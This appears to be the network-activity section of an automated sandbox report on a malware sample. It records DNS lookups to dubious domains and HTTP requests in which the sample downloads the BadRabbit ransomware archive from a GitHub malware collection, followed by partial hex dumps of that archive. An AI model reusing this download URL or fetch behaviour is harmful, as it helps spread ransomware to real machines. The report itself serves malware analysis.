                                                                                                                                                Sep 29, 2022 14:54:22.539824963 CEST8.8.8.8192.168.2.50x6394No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:23.657721996 CEST8.8.8.8192.168.2.50x44a1No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:25.275010109 CEST8.8.8.8192.168.2.50xa34aName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:25.477859974 CEST8.8.8.8192.168.2.50x923bName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:25.724956036 CEST8.8.8.8192.168.2.50x43adNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:26.260488987 CEST8.8.8.8192.168.2.50xbf80Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:28.238610029 CEST8.8.8.8192.168.2.50x5d5dNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:28.879833937 CEST8.8.8.8192.168.2.50x8388No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.240175009 CEST8.8.8.8192.168.2.50xf222Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.334908962 CEST8.8.8.8192.168.2.50xa51cNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.460783005 CEST8.8.8.8192.168.2.50x9bb3Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:29.931166887 CEST8.8.8.8192.168.2.50x8795Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:30.475620031 CEST8.8.8.8192.168.2.50x5cd7No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:31.727960110 CEST8.8.8.8192.168.2.50x6460No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:32.340512991 CEST8.8.8.8192.168.2.50xba40Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:32.447748899 CEST8.8.8.8192.168.2.50x3912Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:32.847434998 CEST8.8.8.8192.168.2.50xd75eNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:33.833672047 CEST8.8.8.8192.168.2.50x11b5Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:36.592428923 CEST8.8.8.8192.168.2.50x8637No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:36.646555901 CEST8.8.8.8192.168.2.50x59c8No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:37.229252100 CEST8.8.8.8192.168.2.50x4bd3No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:38.591080904 CEST8.8.8.8192.168.2.50xdb2No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:40.694590092 CEST8.8.8.8192.168.2.50xe037Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:41.069396973 CEST8.8.8.8192.168.2.50xab15Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:42.585642099 CEST8.8.8.8192.168.2.50x98d7Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:42.692106962 CEST8.8.8.8192.168.2.50x6dc0No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:44.878698111 CEST8.8.8.8192.168.2.50xe941No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:46.180187941 CEST8.8.8.8192.168.2.50x3310Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:46.345323086 CEST8.8.8.8192.168.2.50x7181No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:46.417676926 CEST8.8.8.8192.168.2.50xf02eName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:48.902837992 CEST8.8.8.8192.168.2.50xe0cdNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:49.412662983 CEST8.8.8.8192.168.2.50x4d3bName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:54.215614080 CEST8.8.8.8192.168.2.50x3971No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:54.790144920 CEST8.8.8.8192.168.2.50x48f2No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:55.345763922 CEST8.8.8.8192.168.2.50x32ffNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:55.345763922 CEST8.8.8.8192.168.2.50x32ffNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:55.345763922 CEST8.8.8.8192.168.2.50x32ffNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:54:55.345763922 CEST8.8.8.8192.168.2.50x32ffNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:55:01.029911041 CEST8.8.8.8192.168.2.50xd222Name error (3)secure1.safe-scanerwas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:55:01.030632973 CEST8.8.8.8192.168.2.50xc43aName error (3)www5.internet-security-guard.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                • github.com
                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                • yandex.ru
                                                                                                                                                • searchdusty.com
                                                                                                                                                • www.vikingwebscanner.com
                                                                                                                                                • google.ru
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.549700140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:12 UTC0OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2022-09-29 12:51:12 UTC0INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:10 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:12 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.549701185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:12 UTC2OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2022-09-29 12:51:12 UTC2INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 402632
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:12 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6968-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455873.877570,VS0,VE10
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 59c974547f9549d95d75d0fbc5e3e1f0545c731f
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:12 GMT
                                                                                                                                                Source-Age: 84
                                                                                                                                                2022-09-29 12:51:12 UTC3INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                2022-09-29 12:51:12 UTC19INData Raw: 72 c8 31 c2 9d f7 2e 41 53 ac c7 27 ce 6b c8 aa ef 81 64 8e b4 61 a3 68 c9 b2 4f 51 0f 0c d0 0b 4c 71 6f ed 6f 20 9a 1c 07 c1 6d 4b ad 82 2e 0c d8 76 e0 4e c7 34 dc 23 56 fe 18 59 7d 9d 34 7a 07 81 2e 22 f6 07 d6 af 92 93 9e 99 79 2c 0b b5 1d 5d 9f 43 60 6b 35 90 10 b0 c8 29 dc 00 bb 73 51 54 95 38 6c 8c 8f 1a 0c 72 e7 4d 5b b9 96 5b f8 d4 55 f8 09 c0 2a 6f 2d 76 fb 69 8d 7a f1 e9 d7 35 17 79 fe 2e 8d 55 4d c4 34 a7 1b 02 fe 6e da 8b 97 a7 6e 37 9d 8e cd ae 2b 76 01 4d 9e 15 87 c4 e4 66 02 e2 98 84 31 d0 d4 14 3d 69 e4 12 90 c3 81 a2 a1 71 8a 43 d3 5b c6 fb 0f 0a 40 50 0f e0 8e 4a 58 d9 62 7b 0b 99 1d df 17 a6 67 a8 30 f0 a7 69 b9 75 d6 77 57 ef e2 8b a1 25 9f 21 41 dd f6 20 66 52 70 20 57 c0 71 32 bf ee 40 86 cb d3 32 03 76 87 d4 20 f2 0c 0a 9e 32 dd 55
                                                                                                                                                Data Ascii: r1.AS'kdahOQLqoo mK.vN4#VY}4z."y,]C`k5)sQT8lrM[[U*o-viz5y.UM4nn7+vMf1=iqC[@PJXb{g0iuwW%!A fRp Wq2@2v 2U
                                                                                                                                                2022-09-29 12:51:12 UTC35INData Raw: df 68 45 73 e0 48 d9 9a 68 44 7f cf 25 7e 2c f7 a7 f0 68 54 12 ed d0 2a 22 31 10 ac a1 e1 77 4c 42 a9 31 71 f8 97 16 75 01 a1 1e e1 e1 17 fe 10 23 57 f6 34 80 ff 56 f2 aa 8a 75 ce 91 d4 8c 17 b0 44 67 6d fb 81 09 a0 08 4a fe 24 1e 2f a0 22 14 da d0 bb eb 65 1c fe 98 44 82 fc 8d e5 aa 15 d7 39 42 ae ee c7 8d d4 a1 d4 02 21 3b 0b 24 38 c4 0b d7 38 98 f6 c4 fc a6 80 1d 85 23 73 a9 a9 15 94 27 53 8a 2e 99 55 5e d4 a2 78 66 8e 6d d4 f6 02 ed 7e 13 40 15 8b b9 82 b2 dd 13 fb f0 5b 1e 54 0f 2e 43 8b ca 26 60 fe a3 8e 21 1a fa df 98 d7 6a 59 63 d7 16 27 df f6 07 fe 81 80 1b f1 18 90 3b 3d 7f 64 eb 30 2b d7 59 85 a0 c7 bf 41 be d8 4a d4 0e bd 61 31 21 ea 8f c9 86 ad 0f 6b 39 52 a9 14 fd f1 7d 1f fc 66 70 5c b7 2a 1f d3 7d 54 f2 17 8e a5 98 7e 5b 75 54 c0 49 10 62
                                                                                                                                                Data Ascii: hEsHhD%~,hT*"1wLB1qu#W4VuDgmJ$/"eD9B!;$88#s'S.U^xfm~@[T.C&`!jYc';=d0+YAJa1!k9R}fp\*}T~[uTIb
                                                                                                                                                2022-09-29 12:51:12 UTC51INData Raw: c3 a0 6b 5f 9d ce 11 cf 59 14 7f b2 aa 14 34 99 4d ce 0c a5 85 81 79 45 d1 74 4a 6f 00 aa e4 8c 0e 69 de 4e 90 e7 67 97 7d 3a d9 6b f2 d5 9a 38 fb 8f f7 c0 52 ae 61 47 33 08 16 e3 39 ee ee c8 96 3c 11 6c 39 ba 9a b8 7a 07 c4 d8 f2 f7 97 b1 15 17 ff a2 1a dd f1 7e 85 38 2f 9d e5 80 f3 9f b3 d8 5b 23 1b 2a 83 4b d6 52 de b1 99 e2 e9 f5 41 77 0e 1b 02 6f 18 79 c1 5a 06 84 21 c6 39 b2 28 51 0d e3 1a 6a 8a 22 b1 52 ba 7f a3 10 23 0f 18 f4 9b 7f 22 38 8a 2e 9b cb 3a b1 01 19 21 17 c9 ec 7d 6a a8 f1 4a 1b 2a a1 1f b8 83 72 e1 9b ef eb ae 43 20 62 15 6e 87 c4 84 92 cc 79 4c 84 fa b4 10 67 22 48 cd b7 58 d7 8a 11 c3 48 64 fd 1f f6 92 0a ce f6 1a 5f 92 30 a1 92 09 2d 29 75 d9 45 d3 73 d6 61 82 68 6f d7 f8 a1 50 01 d4 f6 b9 38 c0 2f 02 24 0f 42 83 46 db bc b6 e2 80
                                                                                                                                                Data Ascii: k_Y4MyEtJoiNg}:k8RaG39<l9z~8/[#*KRAwoyZ!9(Qj"R#"8.:!}jJ*rC bnyLg"HXHd_0-)uEsahoP8/$BF
                                                                                                                                                2022-09-29 12:51:12 UTC67INData Raw: d3 e8 b3 a5 57 bb 0f 80 8e 4a d0 94 cd 31 b7 fc 52 9b dd ec 1d 0e df e2 b2 72 10 11 45 d0 13 e7 46 73 0e ee 88 25 59 a0 87 52 2a 7f f1 c9 04 38 b2 8a 86 e3 55 b0 df 6d 8e 1c 77 b0 01 ac 10 05 04 6b ae 2b 3b 5e bf 4a ed 73 d8 ab d3 cf fb a8 6e a2 bc 4f 41 2d c4 15 83 39 f0 dd 86 d1 ca 20 b5 c3 a8 59 39 4c 02 66 11 12 8e 3d b1 f1 60 78 f2 6b e1 ac 59 82 ea 00 59 c1 52 94 4e 15 f8 64 8a cb b7 a7 02 ac 35 7d a2 41 76 da e4 c6 75 30 50 5a d7 bc ec 8f b5 23 13 c9 ba fb ef 45 7f eb 5a e2 8f 23 36 26 7f 40 df 34 a3 e1 62 b2 12 aa ad e7 23 b5 ca 8b 71 b0 44 0a 27 af dd 1e 19 7d 21 dd be 40 7a 66 f1 99 77 2e 7c dc 11 fd 78 b3 18 30 1a e9 85 ba 8d ad 5b f5 01 38 d7 04 ee 9a 7d 9b 2d 3a 21 53 ff 71 58 63 ea e3 5d 5b aa d2 86 cf c9 f7 50 41 78 22 be a2 af af 77 21 ea
                                                                                                                                                Data Ascii: WJ1RrEFs%YR*8Umwk+;^JsnOA-9 Y9Lf=`xkYYRNd5}Avu0PZ#EZ#6&@4b#qD'}!@zfw.|x0[8}-:!SqXc][PAx"w!
                                                                                                                                                2022-09-29 12:51:12 UTC83INData Raw: 9f 8c 81 5a e1 61 65 95 8f cc a2 6e e0 37 5b 40 bf cf de df 7f 30 4e c4 a4 a4 14 6c a5 a4 3e 3b 32 39 ff 30 2f c3 ed af 76 75 0a a1 44 6b d1 d5 e7 ce 30 e9 f3 b2 51 21 30 02 31 4a 3a f3 7d 4c 47 9f 37 81 61 20 f0 24 e0 40 e2 f4 11 69 06 c1 e5 da 68 f6 69 da f1 a8 6a f0 d5 a3 85 b1 b1 09 83 b7 cb 7a 5c 58 d7 9d 8e c4 83 37 08 26 88 ca 0b bd 39 13 32 c4 8f 4a 58 c4 bc bb b9 ec bb fd 1a 09 ac ed 3b 04 a3 46 1a ed 64 16 1a f8 bd ba 5e d2 6b cb 90 6c 03 35 4f 84 50 70 ad 4a d0 df 47 d5 45 6b af 9d d4 e0 9b 68 3f 90 45 96 04 05 49 ea 2d 74 67 09 3f f6 24 51 df 6c 99 ec c5 8c f6 9d 59 93 1f 24 5d 0c 81 bb 8a c2 bc 3b 5d 69 ba 18 5e f1 aa 37 5c a9 5b d7 6f 6c 1c ba 02 d0 af 63 c7 70 af 52 c8 45 95 ee 6b 4d 68 57 cc c4 33 db 39 a3 05 b7 b7 6e 10 0b 85 9f aa 69 12
                                                                                                                                                Data Ascii: Zaen7[@0Nl>;290/vuDk0Q!01J:}LG7a $@ihijz\X7&92JX;Fd^kl5OPpJGEkh?EI-tg?$QlY$];]i^7\[olcpREkMhW39ni
                                                                                                                                                2022-09-29 12:51:12 UTC99INData Raw: 11 1b be 72 2a 9b ac 24 a6 6f d8 66 50 56 81 1f 92 36 08 2a 93 7a dd 7d 06 0e 44 95 94 0a 7e 98 74 6f fa db 94 31 1c c4 1f b4 1d 86 a4 a1 d1 e1 40 d4 9d ad 4b 7d 69 4c f8 2b 15 ac 29 1f c3 92 8c 8c c3 d5 39 a7 cb ce 0a 54 1b 9c 7a 06 85 95 e4 1f a6 6d 48 ba d3 e7 ec e4 f7 d9 e6 03 bf ea e1 48 7f fc 76 cd 8d e7 d5 6f 81 b0 40 29 89 24 11 52 7a c4 89 a8 dd ca 01 9b 14 cd 66 89 e5 5b 32 ef 55 90 2d 79 f7 ae 4f 50 2c 2d 9d da a7 a3 ee f8 e5 2e 08 2d 9f e0 7e 3e 38 67 38 30 2a 9c de 08 b3 ba aa 0d da 44 d4 22 04 bc 5f 6b 86 76 73 da 6a 0c 5c c5 7f 72 5e 25 dc 19 fa 32 9a 0d b2 94 07 a0 01 18 eb a7 77 02 48 54 66 d4 06 42 86 45 c6 28 97 b7 29 76 b6 e9 77 3d ec 66 42 ba bb 7d 87 b2 e0 b3 26 05 14 57 20 e7 ed 14 2e b6 0b 80 70 2b 3c d2 30 8d 0b 60 28 c3 23 b3 31
                                                                                                                                                Data Ascii: r*$ofPV6*z}D~to1@K}iL+)9TzmHHvo@)$Rzf[2U-yOP,-.-~>8g80*D"_kvsj\r^%2wHTfBE()vw=fB}&W .p+<0`(#1
                                                                                                                                                2022-09-29 12:51:12 UTC115INData Raw: 4c 03 ef 99 74 d7 04 e0 e0 eb 91 00 43 79 ac f2 18 2a f3 47 5c d6 d7 27 b0 25 da 87 01 ba 70 e4 5a ff 63 9d d6 b7 ae d1 3c 37 78 cb a8 7f b9 75 b1 29 51 83 cb 06 19 40 74 c2 3b a8 21 2d 7e 8d 82 40 19 00 9f e0 6f 41 20 76 0a a7 3a a1 e5 90 94 2e 75 f5 05 9f 6a 18 d2 46 7a e2 78 47 0c 9c ac 7c 38 b9 3a c9 63 9a a9 2a 81 83 a3 45 01 b0 55 f6 81 42 82 16 05 e0 a3 b3 3e 51 e1 af 65 81 69 99 94 a2 4f 08 0e 28 5f c1 e8 85 9c 79 f3 99 b6 11 eb 2d 99 23 be 0b d0 2a 65 12 97 15 6f a3 57 3b 09 1a 94 1e 0f e4 c6 12 87 fb aa 4b 26 7d e0 e3 40 ba 57 4d ee 09 67 a3 a0 19 71 43 ac bf 27 71 d4 ef 7c 09 e3 7e 45 fe a1 00 d9 c7 41 71 79 0b 2c ad 50 7f c3 31 25 2d 2f 1c 3f a5 b0 43 5a c4 8c f2 72 70 fe 91 a4 53 8d 0e cc 34 f2 2c 8e ce 3a 82 07 4a fd 47 4f 20 c4 80 fe 78 e6
                                                                                                                                                Data Ascii: LtCy*G\'%pZc<7xu)Q@t;!-~@oA v:.ujFzxG|8:c*EUB>QeiO(_y-#*eoW;K&}@WMgqC'q|~EAqy,P1%-/?CZrpS4,:JGO x
                                                                                                                                                2022-09-29 12:51:12 UTC131INData Raw: a6 bf 07 22 95 8f 84 94 f9 f2 00 f4 0d f9 f4 e9 ab 4a 6a aa a8 af e8 ce d6 75 e0 e4 13 2f 28 e3 71 79 43 65 a2 dc 48 b3 74 9a ab e5 6f df 91 5f 22 88 d4 20 57 c7 d6 53 06 78 a9 21 9f 02 23 7d e4 59 1f c2 93 37 e8 9e da 71 57 25 8c ba c2 c4 79 44 67 a5 de c3 e9 47 e8 65 79 14 d4 92 2d 63 2d 75 0b 89 a3 8f c7 ab 8b d4 c5 8d 41 f4 03 b0 e1 e5 ec 74 82 a7 60 43 12 cd 63 97 34 81 68 24 b0 c9 15 f9 ad b8 c8 24 b4 c6 de d5 d7 05 bd 03 f7 6e b9 6f bc e5 8a 54 38 77 b7 b4 e2 bd a3 d9 3f 83 d9 42 8b fc a4 6d e0 91 ac 50 c7 ea e8 47 50 75 88 23 37 cd 02 fc 48 24 97 e7 3b 34 22 92 bd 19 16 1f 42 f8 06 c4 d9 a3 88 b1 70 7f 5c 0e d7 28 f2 43 2c b1 92 65 80 85 7a a6 a1 6d 73 c1 c7 38 3a fb c6 ef e5 98 35 22 37 b4 9c b9 68 a1 22 75 eb c7 e3 e4 74 fa 7f c8 f2 b5 98 16 ed
                                                                                                                                                Data Ascii: "Jju/(qyCeHto_" WSx!#}Y7qW%yDgGey-c-uAt`Cc4h$$noT8w?BmPGPu#7H$;4"Bp\(C,ezms8:5"7h"ut
                                                                                                                                                2022-09-29 12:51:12 UTC147INData Raw: 5e 17 75 6c b3 25 52 16 be 6b cf 2f 3b 84 7a 4f 54 34 3b 54 7c 87 fc 4d df e5 3a 95 42 56 ce c9 3e 90 0a 0b 3c 46 db 0d 38 e7 ea f2 18 b5 cf 4e 58 24 da d8 2f 04 e3 68 58 66 28 6e e1 1f a4 6b 82 f5 5c a5 37 ee 55 3f 21 6a 76 dd f3 aa f5 b0 39 c4 e5 11 15 c1 3a d4 eb e0 92 3a 9c 27 40 2b d2 a0 ae 4e fe 70 be d0 12 fc 5b cc 92 99 5c 2e be 14 e1 1e fd 43 7f f1 b3 64 a6 24 11 d1 93 94 4e ac 26 fe 9b 8a f3 95 b7 ba 6c 50 41 e3 8c b6 19 51 66 ae a9 70 a0 55 63 36 69 87 e6 d7 cc f4 56 9e fc a7 c3 26 7b ce 62 2e 69 99 e1 6d ab c0 da 7d d4 8c 28 2a 46 51 04 70 84 f3 46 d6 24 44 1f 4b 21 99 5c 43 29 c0 f5 4b b4 51 cd 91 f5 fb 2d f8 ec 50 28 19 63 d2 3d 75 a9 d5 58 8f b1 f6 5b d6 da 8c 50 5a eb 7a 9e 1b 8f 72 2a 12 cd 5f d1 27 32 74 28 1b f9 31 29 82 cd e6 8a 89 5e
                                                                                                                                                Data Ascii: ^ul%Rk/;zOT4;T|M:BV><F8NX$/hXf(nk\7U?!jv9::'@+Np[\.Cd$N&lPAQfpUc6iV&{b.im}(*FQpF$DK!\C)KQ-P(c=uX[PZzr*_'2t(1)^
                                                                                                                                                2022-09-29 12:51:12 UTC163INData Raw: a1 20 33 b9 bc 0f 2d 4e e4 00 ff 62 35 f6 95 ca cd 09 9f 09 89 a6 52 2d e9 b4 39 1a ca fa f3 cb 0e fd 04 46 f2 e0 25 20 49 bb 66 e4 bd 4a c1 76 bb a5 05 1e e4 d3 02 09 b2 5d f8 86 48 d2 8d 6f e4 62 e9 31 8b ce 64 18 5c dd 0c e0 56 9b a1 44 29 4e 19 4c 8a 3e f2 77 0f e8 ed bd 61 7c ac 55 6e 1a a8 72 90 08 67 f5 96 57 55 bd d9 16 71 e2 bf f5 b9 70 80 9d 01 11 bb 8f f3 35 fa 3d b4 3a 03 7f 03 de 61 5c 3e 35 ce c3 c7 83 c7 b4 9d 09 48 49 55 2e 3b af 9a c0 35 7e b2 00 d6 d7 93 e9 7a 93 e6 2f c3 e4 5f 8f 7c 2d 61 90 54 ed 67 e8 8d d0 a5 28 ab b7 09 39 90 b1 cc 90 d7 d6 ae 5f b8 f4 71 4a fd b3 c6 86 6b f7 c7 29 3f cb f1 c5 e7 f4 a9 79 f4 f6 5d 76 a0 82 ef 0a 9a 89 37 d1 25 ac 05 03 d0 ba 88 f3 ae de 7c d5 5c 7f e6 2d c0 a1 c3 93 12 b7 3d 82 bc c4 86 41 3c fc 60
                                                                                                                                                Data Ascii: 3-Nb5R-9F% IfJv]Hob1d\VD)NL>wa|UnrgWUqp5=:a\>5HIU.;5~z/_|-aTg(9_qJk)?y]v7%|\-=A<`
                                                                                                                                                2022-09-29 12:51:12 UTC179INData Raw: b7 ba 56 66 0c bc e3 9e 76 70 03 46 37 25 20 fb ea bf 06 bf f6 ae 71 db d3 d0 a3 52 4a d3 23 c9 b8 98 9a b9 da 3c 4b 10 c3 d4 f4 dd 7d 53 37 a0 0d cf 67 d9 97 19 6d 33 c6 6e 65 a1 a5 c3 0e bd c2 fe ab 79 ae 90 06 8e 80 90 45 41 87 0a 7c 18 88 96 92 8b 9e 70 5d 8f 0e fd f3 2f b0 14 69 ec 72 f6 dc fa f0 18 68 59 ce 81 fd d6 ed 16 ba f5 4f e5 bf bf 9f 6e 81 89 12 83 97 ac a3 12 d8 52 3c 9b 41 b8 3c f9 39 3c df 8a 81 30 fd ff 81 d1 68 2b b2 8e d4 16 6e 6e ee 3f 9a 53 3a ae a9 08 ef 41 10 ab 64 8b 81 1c 2f 2d 13 7e ad 74 6f 1f 6e e1 bb 72 d6 13 bb a1 72 a3 52 51 e5 b7 89 ac 7c c4 98 1e 97 c1 23 4e 51 b8 fe 3c 0e d9 6c d1 8c 31 26 c4 0b e3 8e 76 4a 04 f3 ff 70 b8 87 00 30 5d 17 49 84 e2 02 59 eb 05 16 23 5a 56 ab 58 89 5b 6a a4 7c c3 21 1e a2 0a d4 b6 98 db f4
